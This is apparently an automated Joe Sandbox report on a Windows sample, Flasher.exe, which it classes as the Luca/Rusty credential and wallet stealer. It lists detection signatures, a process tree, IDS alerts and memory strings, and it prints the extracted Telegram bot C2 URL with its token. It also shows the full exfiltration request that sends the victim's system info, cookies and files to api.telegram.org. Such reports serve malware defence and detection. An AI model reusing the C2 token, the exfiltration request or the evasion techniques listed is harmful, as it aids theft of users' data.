Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Flasher.exe

Overview

General Information

Sample name:Flasher.exe
Analysis ID:1581484
MD5:7a16f2f0629a440695945db2a191c6a1
SHA1:067c54721377eeefd199acb37402308bdfe73b3b
SHA256:989af492fa898868e67636bf47e06a7c5864f31849fc3b3a07b07e7a3a62d944
Tags:exeuser-aachum
Infos:

Detection

Luca Stealer, Rusty Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Luca Stealer
Yara detected Rusty Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • Flasher.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\Flasher.exe" MD5: 7A16F2F0629A440695945DB2A191C6A1)
    • powershell.exe (PID: 7396 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMO"}
SourceRuleDescriptionAuthorStrings
Flasher.exeJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
      00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
        Process Memory Space: Flasher.exe PID: 7284JoeSecurity_LucaStealerYara detected Luca StealerJoe Security
          Process Memory Space: Flasher.exe PID: 7284JoeSecurity_RustyStealerYara detected Rusty StealerJoe Security
            SourceRuleDescriptionAuthorStrings
            0.0.Flasher.exe.7ff6d34f0000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
              0.2.Flasher.exe.7ff6d34f0000.0.unpackJoeSecurity_LucaStealerYara detected Luca StealerJoe Security
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Flasher.exe", ParentImage: C:\Users\user\Desktop\Flasher.exe, ParentProcessId: 7284, ParentProcessName: Flasher.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 7396, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T21:48:09.220898+010020293231Malware Command and Control Activity Detected192.168.2.449737149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T21:48:09.220898+010020445241A Network Trojan was detected192.168.2.449737149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T21:48:09.220898+010018100081Potentially Bad Traffic192.168.2.449737149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Flasher.exeAvira: detected
                Source: Flasher.exeMalware Configuration Extractor: Luca Stealer {"C2 url": "https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMO"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: Flasher.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3512398 CryptUnprotectData,GetLastError,0_2_00007FF6D3512398
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D357C7E4 BCryptGenRandom,BCryptGenRandom,0_2_00007FF6D357C7E4
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D353034F BCryptGenRandom,BCryptGenRandom,HeapFree,0_2_00007FF6D353034F
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D357C87B BCryptGenRandom,0_2_00007FF6D357C87B
                Source: unknownHTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: Flasher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: rust_stealer_xss.pdb source: Flasher.exe
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35DF7C0 CloseHandle,memset,FindFirstFileW,FindClose,HeapFree,0_2_00007FF6D35DF7C0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49737 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2044524 - Severity 1 - ET MALWARE Win32/Luca Stealer Sending System Information via Telegram (GET) : 192.168.2.4:49737 -> 149.154.167.220:443
                Source: Malware configuration extractorURLs: https://api.telegram.org/bot812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMO
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: ipwho.is
                Source: global trafficHTTP traffic detected: GET /bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-4662852241&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20YT3TY%20(1280,%201024)%0AHWID:%205676401068884178%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Flasher.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416content-length: 938714accept: */*host: api.telegram.org
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 108.181.61.49 108.181.61.49
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: ipwho.is
                Source: Network trafficSuricata IDS: 2029323 - Severity 1 - ET MALWARE Possible Generic RAT over Telegram API : 192.168.2.4:49737 -> 149.154.167.220:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1accept: */*host: ipwho.is
                Source: global trafficHTTP traffic detected: GET /bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-4662852241&caption=%0A-%20IP%20Info%20-%0A%0AIP:%208.46.123.189%0ACountry:%20United%20States%0ACity:%20New%20York%0APostal:%2010000%0AISP:%20Level%20-%20A3356%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20YT3TY%20(1280,%201024)%0AHWID:%205676401068884178%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\Flasher.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%2025%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2018%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=65630d81a695e841-884032d12ba6fc1d-ddec9f059967c02d-61ea391d86b43416content-length: 938714accept: */*host: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: ipwho.is
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Flasher.exeString found in binary or memory: https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML
                Source: Flasher.exeString found in binary or memory: https://api.telegram.org/bot/sendDocument?chat_id=&caption=&parse_mode=HTML0
                Source: Flasher.exe, 00000000.00000003.1760743375.000001EE77951000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1760408069.000001EE778EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7812312068:AAFyVEsyd0q1cihJMPAZWF_CNZa5o5NgMOA/sendDocument?chat_id=-466
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Flasher.exe, 00000000.00000003.1760408069.000001EE77891000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000002.1761203830.000001EE77891000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Flasher.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Flasher.exe, 00000000.00000003.1711673669.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708622950.000001EE7913A000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709363429.000001EE79140000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1711105203.000001EE79145000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712330319.000001EE7914B000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710548405.000001EE79147000.00000004.00000020.00020000.00000000.sdmp, opera stable_default_webdata.0.dr, kometa_default_webdata.0.dr, comodo_default_webdata.0.dr, browser_default_webdata.0.dr, google_default_webdata.0.dr, bravesoftware_default_webdata.0.dr, coowoo_default_webdata.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownHTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35783A7 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,WSAIoctl,WSAGetLastError,0_2_00007FF6D35783A7
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35DC360 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF6D35DC360
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3577C87 NtDeviceIoControlFile,RtlNtStatusToDosError,0_2_00007FF6D3577C87
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35D5C30 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,MultiByteToWideChar,WriteConsoleW,WriteConsoleW,GetLastError,GetLastError,0_2_00007FF6D35D5C30
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3527FBA HeapFree,HeapFree,HeapFree,HeapFree,EnumDisplayMonitors,HeapFree,CreateDCW,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,DeleteDC,memset,EnumDisplaySettingsExW,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,RtlFreeHeap,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,HeapFree,GetSystemTimeAsFileTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,SystemTimeToFileTime,memset,GetTimeZoneInformation,memmove,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,memmove,memmove,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,HeapFree,NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,HeapFree,memmove,memmove,memmove,memmove,HeapFree,HeapFree,memmove,HeapFree,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,HeapFree,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,memmove,HeapFree,CloseHandle,0_2_00007FF6D3527FBA
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35DCF00 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF6D35DCF00
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35E2360 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_00007FF6D35E2360
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35765B1 NtCancelIoFileEx,RtlNtStatusToDosError,0_2_00007FF6D35765B1
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3577C87: NtDeviceIoControlFile,RtlNtStatusToDosError,0_2_00007FF6D3577C87
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35F83DC0_2_00007FF6D35F83DC
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35142D80_2_00007FF6D35142D8
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D354E2150_2_00007FF6D354E215
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36FB9100_2_00007FF6D36FB910
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D367A7F80_2_00007FF6D367A7F8
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35E26B00_2_00007FF6D35E26B0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352257A0_2_00007FF6D352257A
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D34F35680_2_00007FF6D34F3568
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D370A58C0_2_00007FF6D370A58C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3577C870_2_00007FF6D3577C87
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35FAC610_2_00007FF6D35FAC61
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3529D010_2_00007FF6D3529D01
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35B6CD60_2_00007FF6D35B6CD6
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35BFCD30_2_00007FF6D35BFCD3
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3550B9D0_2_00007FF6D3550B9D
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35FDB710_2_00007FF6D35FDB71
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3502B570_2_00007FF6D3502B57
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D351BBEE0_2_00007FF6D351BBEE
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3524A810_2_00007FF6D3524A81
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35CD99E0_2_00007FF6D35CD99E
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35189DC0_2_00007FF6D35189DC
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35229CA0_2_00007FF6D35229CA
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D367809C0_2_00007FF6D367809C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35B50F70_2_00007FF6D35B50F7
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D34F10000_2_00007FF6D34F1000
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36DA0200_2_00007FF6D36DA020
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3527FBA0_2_00007FF6D3527FBA
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D36F6D4C0_2_00007FF6D36F6D4C
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D3506E320_2_00007FF6D3506E32
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D351EDB90_2_00007FF6D351EDB9
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D37364CD0_2_00007FF6D37364CD
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35434B00_2_00007FF6D35434B0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35D445D0_2_00007FF6D35D445D
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35DC4700_2_00007FF6D35DC470
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35374700_2_00007FF6D3537470
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D373752F0_2_00007FF6D373752F
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D356339E0_2_00007FF6D356339E
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35133B20_2_00007FF6D35133B2
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D353034F0_2_00007FF6D353034F
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35F53FC0_2_00007FF6D35F53FC
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35B24060_2_00007FF6D35B2406
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352A3D90_2_00007FF6D352A3D9
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35133E60_2_00007FF6D35133E6
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D37132D00_2_00007FF6D37132D0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35F62930_2_00007FF6D35F6293
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D351330D0_2_00007FF6D351330D
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35C12E70_2_00007FF6D35C12E7
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35112C00_2_00007FF6D35112C0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D352519E0_2_00007FF6D352519E
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D37211EC0_2_00007FF6D37211EC
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35371400_2_00007FF6D3537140
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D357A2200_2_00007FF6D357A220
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D360E20D0_2_00007FF6D360E20D
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35442100_2_00007FF6D3544210
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D360B1D80_2_00007FF6D360B1D8
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35451EE0_2_00007FF6D35451EE
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D353F1D00_2_00007FF6D353F1D0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35401D00_2_00007FF6D35401D0
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D35478B30_2_00007FF6D35478B3
                Source: C:\Users\user\Desktop\Flasher.exeCode function: 0_2_00007FF6D354888A0_2_00007FF6D354888A
